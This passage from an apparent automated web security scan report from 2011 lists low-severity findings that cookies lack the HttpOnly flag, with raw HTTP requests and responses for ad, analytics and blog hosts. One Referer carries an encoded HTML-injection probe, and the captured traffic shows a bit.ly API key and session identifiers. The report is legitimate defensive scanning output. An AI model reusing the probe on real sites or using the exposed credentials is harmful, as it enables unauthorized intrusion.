User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GUID=00058525BF050D44401A5E1461626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE1=+6jd3r4Ya10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE2=+6jd3raZf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:29:41 GMT; path=/; domain=atl.whitepages.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607 HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; AA002=0-0

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:41 GMT
X-DirectServer: whitepg_DS1
Content-Type: application/x-javascript
Content-Length: 12856
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=00058525BF050D44401A5E1461626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE1=+6jd3r4Ya10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE2=+6jd3raZf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:29:41 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='\r\n\r\n<script language=\"JavaScript\">\r\nva
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GUID=0007062FC1990D44493592EB61626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE0=+6jd3r4Zf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE1=+6jd3raaa10014+9qUEKJ8I6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:40:41 GMT; path=/; domain=atl.whitepages.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:41 GMT
X-DirectServer: whitepg_DS0
Content-Type: application/x-javascript
Content-Length: 13325
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=0007062FC1990D44493592EB61626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE0=+6jd3r4Zf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE1=+6jd3raaa10014+9qUEKJ8I6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:40:41 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='\r\n\r\n<script language=\"JavaScript\">\r\nva
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LE1=+65y4r4Ya10038+9KmJKJII6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE3=+65y4r4Wa10024+9KmJKJ-V6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
LE4=+65y4rKba10024+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 17:50:18 GMT
X-DirectServer: whitepg_DS2
Content-Type: application/x-javascript
Content-Length: 11959
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: LE1=+65y4r4Ya10038+9KmJKJII6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE3=+65y4r4Wa10024+9KmJKJ-V6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE4=+65y4rKba10024+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='\r\n\r\n<script language=\"JavaScript\">\r\nva
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:40 GMT
X-DirectServer: whitepg_DS4
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: AA002=0-0; expires=Sun, 30 Jan 2011 01:30:40 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: http://redcated/PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:40 GMT
X-DirectServer: whitepg_DS5
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

17.100. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=5d4473db-24.143.206.162-1293844712; expires=Mon, 28-Jan-2013 23:26:31 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.101. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 29-Jan-2013 01:19:41 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.102. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 29-Jan-2013 01:30:06 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.103. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

17.104. http://bit.ly/javascript-api.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bit.ly
Path:	/javascript-api.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_xsrf=9d5ed86efd7f475d985ae3585609dd41; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascript-api.js?version=1.02&login=sciam&apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&history=1 HTTP/1.1
Host: bit.ly
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 17:14:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Connection: keep-alive
Pragma: no-cache
Expires: Sun, 30-Jan-2011 14:14:48 GMT
Allow: GET, HEAD, POST
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: CP="CAO PSA OUR"
Set-Cookie: _xsrf=9d5ed86efd7f475d985ae3585609dd41; Path=/
Content-Length: 8436

if (typeof(BitlyApi) == 'undefined')
var BitlyApi = {}; // BitlyApi namespace. You sholdn't need to access methods here. Instead, use an instance of BitlyApiClient().

if (typeof(BitlyCB) == 'unde
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.msdn.com
Path:	/b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+29+Jan+2011+23%3a22%3a07+GMT; expires=Sun, 29-Jan-2012 23:22:07 GMT; path=/
AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; expires=Sun, 30-Jan-2011 23:22:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx HTTP/1.1
Host: blogs.msdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+29+Jan+2011+23%3a22%3a07+GMT; expires=Sun, 29-Jan-2012 23:22:07 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
X-Pingback: http://blogs.msdn.com/b/delay/pingback.aspx
X-AspNet-Version: 2.0.50727
Set-Cookie: AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; expires=Sun, 30-Jan-2011 23:22:07 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 29 Jan 2011 23:22:07 GMT
Content-Length: 75605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

17.106. http://blogs.silverlight.net/ScriptResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.silverlight.net
Path:	/ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:58 GMT; expires=Sun, 29-Jan-2012 23:40:58 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd HTTP/1.1
Host: blogs.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 315
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:58 GMT; expires=Sun, 29-Jan-2012 23:40:58 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:40:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

17.107. http://blogs.silverlight.net/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.silverlight.net
Path:	/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:55 GMT; expires=Sun, 29-Jan-2012 23:40:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd HTTP/1.1
Host: blogs.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 315
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:55 GMT; expires=Sun, 29-Jan-2012 23:40:55 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:40:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

17.108. http://blogs.silverlight.net/showcasehosted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.silverlight.net
Path:	/showcasehosted/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; expires=Sat, 29-Jan-2011 23:36:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showcasehosted/ HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; path=/; HttpOnly
Set-Cookie: CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; expires=Sat, 29-Jan-2011 23:36:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Content-Length: 8701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA-C
...[SNIP]...

17.109. http://blogs.silverlight.net/showcasehosted/default.aspx previous next

Summary

Severity:	Information
